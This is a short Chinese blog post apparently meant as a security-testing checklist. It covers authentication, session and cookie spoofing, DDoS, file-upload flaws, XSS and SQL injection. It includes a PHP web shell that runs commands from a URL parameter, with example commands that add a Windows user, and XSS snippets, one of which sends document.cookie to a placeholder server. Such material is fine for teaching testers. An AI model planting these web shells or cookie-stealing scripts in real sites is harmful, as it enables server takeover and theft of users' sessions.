美文网首页
安全测试

安全测试

作者: 反素 | 来源:发表于2019-05-23 16:17 被阅读0次

从4方面考虑

1.认证与授权

1.1认证

1.2权限

1.3避免未经授权的页面可以直接访问

2.session与cookie

通过抓包工具或者F12查看

2.1session与cookie欺骗

2.2防止作用域为根目录

3.ddos拒绝服务攻击

意思就是疯狂地向服务器发送请求,导致服务器崩溃

3.1使用肉鸡

3.2攻击联盟

4.文件上传漏洞

4.1比如:创建一个后缀为.PHP的文件,代码为   <?php phpinfo( );?>   若有漏洞,会将服务器的情况展现出来

4.2 在输入框输入 <?php system($_GET['cmd']);?>    保存成功后刷洗页面,在URL地址后面输入?cmd=dir  ;   dir  a;   net user hello/add;  net user hello/delet;

5.XSS跨站攻击

cross site script ,即往web页面插入恶意HTML代码,当用户浏览该页时,嵌入其中的代码被执行,

以下是进行跨站攻击使用的一些脚本

<input type="button"    value="点我"   onclick="alert('你好')" />

<input type="button"    value="点我"   onclick="alert(document.cookie)" />       此时的cookie读取了但未保存

<input type="button"    value="点我"   onclick="location.href='http://服务器地址/cookie.php?cookie='+docunment.cookie"/ > 

6.sql注入

https://www.cnblogs.com/imyalost/p/8243128.html

相关文章

  • 测试类型划分

    功能测试 性能测试 性能测试主要包含以下方面: 性能测试指标 性能测试常用工具 安全测试 安全测试常用工具 安全测...

  • web安全测试文章

    Web安全测试漏洞场景 web安全性测试用例 验证码的测试用例分析 WEB安全测试的类型 Web安全测试中常见逻辑...

  • 在功能测试中需要有安全测试思维(文尾附安全测试工具)

    “ 什么是安全测试?为什么要做安全测试?安全测试与功能测试之间有何联系? ” 今天,很多软件并没有经过专门的安全测...

  • 如何进行安全性测试

    一、软件的安全性测试 软件安全性测试包括程序、网络、数据库安全性测试。根据系统安全指标不同测试策略也不同。 ...

  • 安全测试的考虑点及测试方法

    软件安全性测试主要包括程序、数据库安全性测试。根据系统安全指标不同测试策略也不同。 用户认证安全的测试要考虑问题:...

  • 阿里资深软件测试工程师推荐测试人员必学——安全测试入门介绍

    安全测试定义 安全测试是建立在功能测试基础上进行的测试,安全测试提供证据表明,在面对恶意攻击时,应用仍能充分满足它...

  • app与web测试注重点

    WEB端:UI、兼容、安全 功能测试 界面测试 性能测试 兼容性测试 安全性测试 APP端:硬件、系统、分辨率、网...

  • 电缆故障测试仪测试过程中注意事项

    电缆故障测试的安全问题分为测试仪安全和设备安全。测试人员的安全应注意仪器的接地和放电。设备的安全性主要是正确的接线...

  • APP测试点

    .APP测试点: (1)安全测试:软件权限、安装与卸载、数据安全性、通讯安全性 (2)安装、卸载测试 (3)UI测...

  • 安全测试工具

    安全测试工具:Appscan、AWVS、SqlMap、BurpSuite、Fortify Web安全测试方法:sq...

网友评论

      本文标题:安全测试

      本文链接:https://www.haomeiwen.com/subject/mhqbzqtx.html